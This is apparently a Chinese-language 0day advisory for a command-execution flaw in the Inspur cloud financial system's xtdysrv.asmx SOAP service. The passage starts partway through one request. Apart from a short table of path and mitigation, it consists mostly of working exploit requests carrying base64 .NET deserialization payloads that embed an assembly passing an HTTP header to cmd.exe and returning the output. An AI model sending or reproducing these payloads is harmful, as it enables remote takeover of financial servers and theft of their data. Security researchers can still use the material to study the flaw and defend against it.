AKAOgAnQAOABsBCAEOACMBCAEKAE8BnQAOAIYBZwEGAK8BIgAGACQCGgIGAEQCGgIGAGkCIgAAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAACgAhALQAHAAhANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQBKwBBAEIBMAAhAFsBNQBJAJoBOgBRAKYBPwBZALYBRABBAL0BMABBAMsBSgBBAOYBSgBBAAACSgA5ABQCTwA5ADECUwBpAE8CWAAxAFkCMAAxAF8CCgAxAGUCCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAAAAAAAABABkAAAAAAAQAAAAAAAAAAAAAABMAnQAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAA8TW9kdWxlPgBrd3V3YWNwdy5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrd3V3YWNwdwBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0hlYWRlcnMAZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABzZXRfQXJndW1lbnRzAHNldF9SZWRpcmVjdFN0YW5kYXJkT3V0cHV0AHNldF9SZWRpcmVjdFN0YW5kYXJkRXJyb3IAc2V0X1VzZVNoZWxsRXhlY3V0ZQBTdGFydABTeXN0ZW0uSU8AU3RyZWFtUm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tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=</strFormAssignment>
<isBase>0</isBase>
</GetChildFormAndEntityList>
</soap:Body>
</soap:Envelope>
浪潮云财务系统xtdysrv.asmx存在命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/cwbase/service/rps/xtdysrv.asmx |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SavePrintFormatAssign xmlns="http://tempuri.org/">
<psBizObj>string</psBizObj>
<psLxId>string</psLxId>
<psLxMc>string</psLxMc>
<printOpByte>AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwBrydRkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAN4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACQJgAASwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAA